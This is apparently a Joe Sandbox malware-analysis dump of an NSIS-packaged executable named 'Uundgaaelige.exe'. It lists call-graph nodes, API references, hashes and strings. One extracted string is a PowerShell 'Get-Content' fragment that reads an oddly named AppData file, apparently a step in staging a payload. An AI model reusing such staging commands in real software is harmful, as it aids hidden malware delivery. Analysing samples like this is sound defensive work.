405a5c CharNextA 3687->3705 3689 405819 5 API calls 3688->3689 3690 405a08 3689->3690 3691 405a22 3690->3691 3692 405a0c 3690->3692 3693 4051c0 24 API calls 3691->3693 3692->3672 3697 4051c0 24 API calls 3692->3697 3693->3672 3694 4059ad FindNextFileA 3696 4059c5 FindClose 3694->3696 3694->3705 3696->3685 3698 405a19 3697->3698 3699 405e78 36 API calls 3698->3699 3701 405a20 3699->3701 3701->3672 3702 405861 60 API calls 3702->3705 3703 4051c0 24 API calls 3703->3694 3704 4051c0 24 API calls 3704->3705 3705->3687 3705->3694 3705->3702 3705->3703 3705->3704 3706 405e78 36 API calls 3705->3706 3708 406099 lstrcpynA 3705->3708 3709 405819 3705->3709 3706->3705 3707->3675 3708->3705 3717 405c0d GetFileAttributesA 3709->3717 3712 405846 3712->3705 3713 405834 RemoveDirectoryA 3715 405842 3713->3715 3714 40583c DeleteFileA 3714->3715 3715->3712 3716 405852 SetFileAttributesA 3715->3716 3716->3712 3718 405825 3717->3718 3719 405c1f SetFileAttributesA 3717->3719 3718->3712 3718->3713 3718->3714 3719->3718 4325 401490 4326 4051c0 24 API calls 4325->4326 4327 401497 4326->4327 4328 401d95 GetDC 4329 402a9f 17 API calls 4328->4329 4330 401da7 GetDeviceCaps MulDiv ReleaseDC 4329->4330 4331 402a9f 17 API calls 4330->4331 4332 401dd8 4331->4332 4333 4060bb 17 API calls 4332->4333 4334 401e15 CreateFontIndirectA 4333->4334 4335 402577 4334->4335 4343 401d1a 4344 402a9f 17 API calls 4343->4344 4345 401d28 SetWindowLongA 4344->4345 4346 402951 4345->4346 4347 40491b 4348 404947 4347->4348 4349 40492b 4347->4349 4351 40497a 4348->4351 4352 40494d SHGetPathFromIDListA 4348->4352 4358 405799 GetDlgItemTextA 4349->4358 4354 404964 SendMessageA 4352->4354 4355 40495d 4352->4355 4353 404938 SendMessageA 4353->4348 4354->4351 4356 40140b 2 API calls 4355->4356 4356->4354 4358->4353 4364 40149d 4365 4022e1 4364->4365 4366 4014ab PostQuitMessage 4364->4366 4366->4365 4367 40159d 4368 402ac1 17 API calls 4367->4368 4369 4015a4 SetFileAttributesA 4368->4369 4370 4015b6 4369->4370 4371 401a1e 
4372 402ac1 17 API calls 4371->4372 4373 401a27 ExpandEnvironmentStringsA 4372->4373 4374 401a3b 4373->4374 4376 401a4e 4373->4376 4375 401a40 lstrcmpA 4374->4375 4374->4376 4375->4376 4377 40171f 4378 402ac1 17 API calls 4377->4378 4379 401726 SearchPathA 4378->4379 4380 401741 4379->4380 4381 4042a3 4382 4042b9 4381->4382 4387 4043c5 4381->4387 4385 40415a 18 API calls 4382->4385 4383 404434 4384 4044fe 4383->4384 4386 40443e GetDlgItem 4383->4386 4393 4041c1 8 API calls 4384->4393 4388 40430f 4385->4388 4389 404454 4386->4389 4390 4044bc 4386->4390 4387->4383 4387->4384 4391 404409 GetDlgItem SendMessageA 4387->4391 4392 40415a 18 API calls 4388->4392 4389->4390 4397 40447a SendMessageA LoadCursorA SetCursor 4389->4397 4390->4384 4394 4044ce 4390->4394 4414 40417c KiUserCallbackDispatcher 4391->4414 4396 40431c CheckDlgButton 4392->4396 4403 4044f9 4393->4403 4398 4044d4 SendMessageA 4394->4398 4399 4044e5 4394->4399 4412 40417c KiUserCallbackDispatcher 4396->4412 4415 404547 4397->4415 4398->4399 4399->4403 4404 4044eb SendMessageA 4399->4404 4400 40442f 4405 404523 SendMessageA 4400->4405 4404->4403 4405->4383 4406 40433a GetDlgItem 4413 40418f SendMessageA 4406->4413 4409 404350 SendMessageA 4410 404377 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4409->4410 4411 40436e GetSysColor 4409->4411 4410->4403 4411->4410 4412->4406 4413->4409 4414->4400 4418 40577b ShellExecuteExA 4415->4418 4417 4044ad LoadCursorA SetCursor 4417->4390 4418->4417 4419 401e25 4420 402a9f 17 API calls 4419->4420 4421 401e2b 4420->4421 4422 402a9f 17 API calls 4421->4422 4423 401e37 4422->4423 4424 401e43 ShowWindow 4423->4424 4425 401e4e EnableWindow 4423->4425 4426 402951 4424->4426 4425->4426 4427 406725 4428 4065a9 4427->4428 4429 406f14 4428->4429 4430 406633 GlobalAlloc 4428->4430 4431 40662a GlobalFree 4428->4431 4432 4066a1 GlobalFree 4428->4432 4433 4066aa GlobalAlloc 4428->4433 4430->4428 4430->4429 4431->4430 4432->4433 4433->4428 4433->4429 4434 4064a6 
WaitForSingleObject 4435 4064c0 4434->4435 4436 4064d2 GetExitCodeProcess 4435->4436 4437 40646d 2 API calls 4435->4437 4438 4064c7 WaitForSingleObject 4437->4438 4438->4435 4439 4038a7 4440 4038b2 4439->4440 4441 4038b6 4440->4441 4442 4038b9 GlobalAlloc 4440->4442 4442->4441 4443 401f2b 4444 402ac1 17 API calls 4443->4444 4445 401f32 4444->4445 4446 40639c 2 API calls 4445->4446 4447 401f38 4446->4447 4449 401f4a 4447->4449 4450 405ff7 wsprintfA 4447->4450 4450->4449 4451 40292c SendMessageA 4452 402951 4451->4452 4453 402946 InvalidateRect 4451->4453 4453->4452 4461 405134 4462 405144 4461->4462 4463 405158 4461->4463 4465 4051a1 4462->4465 4466 40514a 4462->4466 4464 405160 IsWindowVisible 4463->4464 4472 405177 4463->4472 4464->4465 4467 40516d 4464->4467 4468 4051a6 CallWindowProcA 4465->4468 4469 4041a6 SendMessageA 4466->4469 4474 404a8b SendMessageA 4467->4474 4470 405154 4468->4470 4469->4470 4472->4468 4479 404b0b 4472->4479 4475 404aea SendMessageA 4474->4475 4476 404aae GetMessagePos ScreenToClient SendMessageA 4474->4476 4477 404ae2 4475->4477 4476->4477 4478 404ae7 4476->4478 4477->4472 4478->4475 4488 406099 lstrcpynA 4479->4488 4481 404b1e 4489 405ff7 wsprintfA 4481->4489 4483 404b28 4484 40140b 2 API calls 4483->4484 4485 404b31 4484->4485 4490 406099 lstrcpynA 4485->4490 4487 404b38 4487->4465 4488->4481 4489->4483 4490->4487 4491 4026b4 4492 4026ba 4491->4492 4493 402951 4492->4493 4494 4026c2 FindClose 4492->4494 4494->4493 4495 402736 4496 402ac1 17 API calls 4495->4496 4497 402744 4496->4497 4498 40275a 4497->4498 4499 402ac1 17 API calls 4497->4499 4500 405c0d 2 API calls 4498->4500 4499->4498 4501 402760 4500->4501 4523 405c32 GetFileAttributesA CreateFileA 4501->4523 4503 40276d 4504 402816 4503->4504 4505 402779 GlobalAlloc 4503->4505 4506 402831 4504->4506 4507 40281e DeleteFileA 4504->4507 4508 402792 4505->4508 4509 40280d CloseHandle 4505->4509 4507->4506 4524 4032c5 SetFilePointer 4508->4524 4509->4504 4511 402798 4512 4032af 
ReadFile 4511->4512 4513 4027a1 GlobalAlloc 4512->4513 4514 4027b1 4513->4514 4515 4027eb 4513->4515 4516 40303e 44 API calls 4514->4516 4517 405cd9 WriteFile 4515->4517 4522 4027be 4516->4522 4518 4027f7 GlobalFree 4517->4518 4519 40303e 44 API calls 4518->4519 4521 40280a 4519->4521 4520 4027e2 GlobalFree 4520->4515 4521->4509 4522->4520 4523->4503 4524->4511 4525 4014b7 4526 4014bd 4525->4526 4527 401389 2 API calls 4526->4527 4528 4014c5 4527->4528 4529 401b39 4530 402ac1 17 API calls 4529->4530 4531 401b40 4530->4531 4532 402a9f 17 API calls 4531->4532 4533 401b49 wsprintfA 4532->4533 4534 402951 4533->4534 4535 40233a 4536 402ac1 17 API calls 4535->4536 4537 40234b 4536->4537 4538 402ac1 17 API calls 4537->4538 4539 402354 4538->4539 4540 402ac1 17 API calls 4539->4540 4541 40235e GetPrivateProfileStringA 4540->4541 3829 4015bb 3830 402ac1 17 API calls 3829->3830 3831 4015c2 3830->3831 3832 405aca 4 API calls 3831->3832 3842 4015ca 3832->3842 3833 401624 3835 401652 3833->3835 3836 401629 3833->3836 3834 405a5c CharNextA 3834->3842 3838 401423 24 API calls 3835->3838 3848 401423 3836->3848 3845 40164a 3838->3845 3840 405703 2 API calls 3840->3842 3842->3833 3842->3834 3842->3840 3843 405720 5 API calls 3842->3843 3846 40160c GetFileAttributesA 3842->3846 3847 405686 4 API calls 3842->3847 3843->3842 3844 40163b SetCurrentDirectoryA 3844->3845 3846->3842 3847->3842 3849 4051c0 24 API calls 3848->3849 3850 401431 3849->3850 3851 406099 lstrcpynA 3850->3851 3851->3844 4542 401d3b GetDlgItem GetClientRect 4543 402ac1 17 API calls 4542->4543 4544 401d6b LoadImageA SendMessageA 4543->4544 4545 402951 4544->4545 4546 401d89 DeleteObject 4544->4546 4546->4545 4547 4016bb 4548 402ac1 17 API calls 4547->4548 4549 4016c1 GetFullPathNameA 4548->4549 4550 4016f9 4549->4550 4551 4016d8 4549->4551 4552 402951 4550->4552 4553 40170d GetShortPathNameA 4550->4553 4551->4550 4554 40639c 2 API calls 4551->4554 4553->4552 4555 4016e9 4554->4555 4555->4550 4557 406099 lstrcpynA 
4555->4557 4557->4550 4558 404b3d GetDlgItem GetDlgItem 4559 404b8f 7 API calls 4558->4559 4565 404da7 4558->4565 4560 404c32 DeleteObject 4559->4560 4561 404c25 SendMessageA 4559->4561 4562 404c3b 4560->4562 4561->4560 4563 404c72 4562->4563 4564 4060bb 17 API calls 4562->4564 4566 40415a 18 API calls 4563->4566 4569 404c54 SendMessageA SendMessageA 4564->4569 4568 404e8b 4565->4568 4576 404a8b 5 API calls 4565->4576 4588 404e18 4565->4588 4572 404c86 4566->4572 4567 404f37 4570 404f41 SendMessageA 4567->4570 4571 404f49 4567->4571 4568->4567 4573 404ee4 SendMessageA 4568->4573 4601 404d9a 4568->4601 4569->4562 4570->4571 4581 404f62 4571->4581 4582 404f5b ImageList_Destroy 4571->4582 4590 404f72 4571->4590 4577 40415a 18 API calls 4572->4577 4579 404ef9 SendMessageA 4573->4579 4573->4601 4574 4041c1 8 API calls 4580 40512d 4574->4580 4575 404e7d SendMessageA 4575->4568 4576->4588 4589 404c94 4577->4589 4578 4050e1 4586 4050f3 ShowWindow GetDlgItem ShowWindow 4578->4586 4578->4601 4584 404f0c 4579->4584 4585 404f6b GlobalFree 4581->4585 4581->4590 4582->4581 4583 404d68 GetWindowLongA SetWindowLongA 4587 404d81 4583->4587 4594 404f1d SendMessageA 4584->4594 4585->4590 4586->4601 4591 404d87 ShowWindow 4587->4591 4592 404d9f 4587->4592 4588->4568 4588->4575 4589->4583 4593 404ce3 SendMessageA 4589->4593 4595 404d62 4589->4595 4598 404d30 SendMessageA 4589->4598 4599 404d1f SendMessageA 4589->4599 4590->4578 4600 404b0b 4 API calls 4590->4600 4605 404fad 4590->4605 4609 40418f SendMessageA 4591->4609 4610 40418f SendMessageA 4592->4610 4593->4589 4594->4567 4595->4583 4595->4587 4598->4589 4599->4589 4600->4605 4601->4574 4602 4050b7 InvalidateRect 4602->4578 4603 4050cd 4602->4603 4606 404a46 20 API calls 4603->4606 4604 404fdb SendMessageA 4608 404ff1 4604->4608 4605->4604 4605->4608 4606->4578 4607 405065 SendMessageA SendMessageA 4607->4608 4608->4602 4608->4607 4609->4601 4610->4565

                                                  Control-flow Graph
                                                  [Graph image not preserved; legend: Executed / Not Executed]
                                                  APIs
                                                  • SetErrorMode.KERNELBASE ref: 00403332
                                                  • GetVersion.KERNEL32 ref: 00403338
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040336B
                                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033A7
                                                  • OleInitialize.OLE32(00000000), ref: 004033AE
                                                  • SHGetFileInfoA.SHELL32(0041FCF0,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004033CA
                                                  • GetCommandLineA.KERNEL32(00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004033DF
                                                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Uundgaaelige.exe",00000000,?,00000006,00000008,0000000A), ref: 004033F2
                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Uundgaaelige.exe",00000020,?,00000006,00000008,0000000A), ref: 0040341D
                                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 0040351A
                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 0040352B
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403537
                                                  • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040354B
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403553
                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403564
                                                  • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040356C
                                                  • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403580
                                                    • Part of subcall function 00406431: GetModuleHandleA.KERNEL32(?,?,?,00403380,0000000A), ref: 00406443
                                                    • Part of subcall function 00406431: GetProcAddress.KERNEL32(00000000,?), ref: 0040645E
                                                    • Part of subcall function 00406099: lstrcpynA.KERNEL32(?,?,00000400,004033DF,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004060A6
                                                    • Part of subcall function 004038E9: lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\raffineredes\cerous,1033,shaharit Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,shaharit Setup: Completed,00000000,00000002,77273410), ref: 004039D9
                                                    • Part of subcall function 004038E9: lstrcmpiA.KERNEL32(?,.exe), ref: 004039EC
                                                    • Part of subcall function 004038E9: GetFileAttributesA.KERNEL32(: Completed), ref: 004039F7
                                                    • Part of subcall function 004038E9: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\raffineredes\cerous), ref: 00403A40
                                                    • Part of subcall function 004038E9: RegisterClassA.USER32(00423EC0), ref: 00403A7D
                                                    • Part of subcall function 004037F7: CloseHandle.KERNEL32(000002AC,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 00403809
                                                    • Part of subcall function 004037F7: CloseHandle.KERNEL32(000002BC,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 0040381D
                                                  • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 0040362E
                                                  • ExitProcess.KERNEL32 ref: 0040364F
                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 0040376C
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403773
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040378B
                                                  • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037AA
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 004037CE
                                                  • ExitProcess.KERNEL32 ref: 004037F1
                                                    • Part of subcall function 004057B5: MessageBoxIndirectA.USER32(0040A230), ref: 00405810
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: HandleProcess$ExitFile$CloseEnvironmentModulePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpilstrcpyn
                                                  • String ID: "$"$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt$"C:\Users\user\Desktop\Uundgaaelige.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\raffineredes\cerous$C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne$C:\Users\user\Desktop$C:\Users\user\Desktop\Uundgaaelige.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                  • API String ID: 3704715180-3725486114
                                                  • Opcode ID: 6fb2701c2198554de983d489162d70f6248e26c12371a32bdff927a978f2d77a
                                                  • Instruction ID: 629f98fd345f67a1e75e2db33264847053f345a98c6a7e8b50a39e9081f0102f
                                                  • Opcode Fuzzy Hash: 6fb2701c2198554de983d489162d70f6248e26c12371a32bdff927a978f2d77a
                                                  • Instruction Fuzzy Hash: 46C1E6702047506AD721AF759D89A2F3EACAB81706F45443FF581B61E2CB7C8A158B2F

                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 0040535D
                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040536C
                                                  • GetClientRect.USER32(?,?), ref: 004053A9
                                                  • GetSystemMetrics.USER32(00000002), ref: 004053B0
                                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004053D1
                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004053E2
                                                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 004053F5
                                                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405403
                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405416
                                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405438
                                                  • ShowWindow.USER32(?,00000008), ref: 0040544C
                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040546D
                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040547D
                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405496
                                                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004054A2
                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040537B
                                                    • Part of subcall function 0040418F: SendMessageA.USER32(00000028,?,00000001,00403FBF), ref: 0040419D
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004054BE
                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00005292,00000000), ref: 004054CC
                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004054D3
                                                  • ShowWindow.USER32(00000000), ref: 004054F6
                                                  • ShowWindow.USER32(?,00000008), ref: 004054FD
                                                  • ShowWindow.USER32(00000008), ref: 00405543
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405577
                                                  • CreatePopupMenu.USER32 ref: 00405588
                                                  • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 0040559D
                                                  • GetWindowRect.USER32(?,000000FF), ref: 004055BD
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055D6
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405612
                                                  • OpenClipboard.USER32(00000000), ref: 00405622
                                                  • EmptyClipboard.USER32 ref: 00405628
                                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 00405631
                                                  • GlobalLock.KERNEL32(00000000), ref: 0040563B
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040564F
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405668
                                                  • SetClipboardData.USER32(00000001,00000000), ref: 00405673
                                                  • CloseClipboard.USER32 ref: 00405679
                                                  Strings
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                  • String ID: 0B
                                                  • API String ID: 4154960007-4132856435
                                                  • Opcode ID: 4ae86a2eb0e764239c625fe7474c6516e4a04bb5ce475004cf9a6bce91262fda
                                                  • Instruction ID: 65bb4f05285cabcaf0c1ceede2bf8135bd939e85a5c998f60940a67221f6d910
                                                  • Opcode Fuzzy Hash: 4ae86a2eb0e764239c625fe7474c6516e4a04bb5ce475004cf9a6bce91262fda
                                                  • Instruction Fuzzy Hash: A8A17A71900208BFDB119FA0DE89EAE7F79FB08355F00403AFA55BA1A0CB754E519F68

                                                  APIs
                                                  • DeleteFileA.KERNELBASE(?,?,77273410,77272EE0,00000000), ref: 0040588A
                                                  • lstrcatA.KERNEL32(00421D38,\*.*,00421D38,?,?,77273410,77272EE0,00000000), ref: 004058D2
                                                  • lstrcatA.KERNEL32(?,0040A014,?,00421D38,?,?,77273410,77272EE0,00000000), ref: 004058F3
                                                  • lstrlenA.KERNEL32(?,?,0040A014,?,00421D38,?,?,77273410,77272EE0,00000000), ref: 004058F9
                                                  • FindFirstFileA.KERNEL32(00421D38,?,?,?,0040A014,?,00421D38,?,?,77273410,77272EE0,00000000), ref: 0040590A
                                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004059B7
                                                  • FindClose.KERNEL32(00000000), ref: 004059C8
                                                  Strings
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\Uundgaaelige.exe"$\*.*
                                                  • API String ID: 2035342205-795289563
                                                  • Opcode ID: 83b5a4a5d0d8edda3f8e0557dfde68d1d2535845567fb2c63194c6eb2875a849
                                                  • Instruction ID: 1dcfc4082d76b88a8dbc056b088e655b37054d2965a561fc4bca86fefb361094
                                                  • Opcode Fuzzy Hash: 83b5a4a5d0d8edda3f8e0557dfde68d1d2535845567fb2c63194c6eb2875a849
                                                  • Instruction Fuzzy Hash: 8C51AF71900A04EADB22AB258C85BBF7A78DF42724F14817BF851B51D2D73C4982DF6E
                                                  APIs
                                                  • FindFirstFileA.KERNELBASE(77273410,00422580,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,00405B62,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,77273410,?,77272EE0,00405881,?,77273410,77272EE0), ref: 004063A7
                                                  • FindClose.KERNELBASE(00000000), ref: 004063B3
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nsa17F6.tmp, xrefs: 0040639C
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsa17F6.tmp
                                                  • API String ID: 2295610775-223556267
                                                  • Opcode ID: 650a356e45ca360fc625af9c332ec7d5af07b83f4ad3dd0750b8552cb66ed4f4
                                                  • Instruction ID: 7ad18ffb452888df832aaad39da4d842c40e8f76539fb63f13b43eacc156c169
                                                  • Opcode Fuzzy Hash: 650a356e45ca360fc625af9c332ec7d5af07b83f4ad3dd0750b8552cb66ed4f4
                                                  • Instruction Fuzzy Hash: 7CD012316050306BC20117386E0C84B7A5C9F053307119B37F9A6F12E0D7748CB286DD

                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CC2
                                                  • ShowWindow.USER32(?), ref: 00403CDF
                                                  • DestroyWindow.USER32 ref: 00403CF3
                                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D0F
                                                  • GetDlgItem.USER32(?,?), ref: 00403D30
                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D44
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403D4B
                                                  • GetDlgItem.USER32(?,00000001), ref: 00403DF9
                                                  • GetDlgItem.USER32(?,00000002), ref: 00403E03
                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403E1D
                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E6E
                                                  • GetDlgItem.USER32(?,00000003), ref: 00403F14
                                                  • ShowWindow.USER32(00000000,?), ref: 00403F35
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F47
                                                  • EnableWindow.USER32(?,?), ref: 00403F62
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F78
                                                  • EnableMenuItem.USER32(00000000), ref: 00403F7F
                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403F97
                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FAA
                                                  • lstrlenA.KERNEL32(shaharit Setup: Completed,?,shaharit Setup: Completed,00000000), ref: 00403FD4
                                                  • SetWindowTextA.USER32(?,shaharit Setup: Completed), ref: 00403FE3
                                                  • ShowWindow.USER32(?,0000000A), ref: 00404117
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                  • String ID: shaharit Setup: Completed
                                                  • API String ID: 3282139019-2035189024
                                                  • Opcode ID: 52da23376c786621b01899b05758cefab0ff852f565aac078f1ff0427d2d89b0
                                                  • Instruction ID: afa02c3f8619f32611db6353159f3c7bef7a20c9a9555f4ee95b1447c660ea49
                                                  • Opcode Fuzzy Hash: 52da23376c786621b01899b05758cefab0ff852f565aac078f1ff0427d2d89b0
                                                  • Instruction Fuzzy Hash: 6FC11271600201FBDB206F61EE89D2B3AB8FB94306F51053EF661B51F0CB7998829B1D

                                                  APIs
                                                    • Part of subcall function 00406431: GetModuleHandleA.KERNEL32(?,?,?,00403380,0000000A), ref: 00406443
                                                    • Part of subcall function 00406431: GetProcAddress.KERNEL32(00000000,?), ref: 0040645E
                                                  • lstrcatA.KERNEL32(1033,shaharit Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,shaharit Setup: Completed,00000000,00000002,77273410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Uundgaaelige.exe",00000000), ref: 00403964
                                                  • lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\raffineredes\cerous,1033,shaharit Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,shaharit Setup: Completed,00000000,00000002,77273410), ref: 004039D9
                                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 004039EC
                                                  • GetFileAttributesA.KERNEL32(: Completed), ref: 004039F7
                                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\raffineredes\cerous), ref: 00403A40
                                                    • Part of subcall function 00405FF7: wsprintfA.USER32 ref: 00406004
                                                  • RegisterClassA.USER32(00423EC0), ref: 00403A7D
                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403A95
                                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403ACA
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403B00
                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,00423EC0), ref: 00403B2C
                                                  • GetClassInfoA.USER32(00000000,RichEdit,00423EC0), ref: 00403B39
                                                  • RegisterClassA.USER32(00423EC0), ref: 00403B42
                                                  • DialogBoxParamA.USER32(?,00000000,00403C86,00000000), ref: 00403B61
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
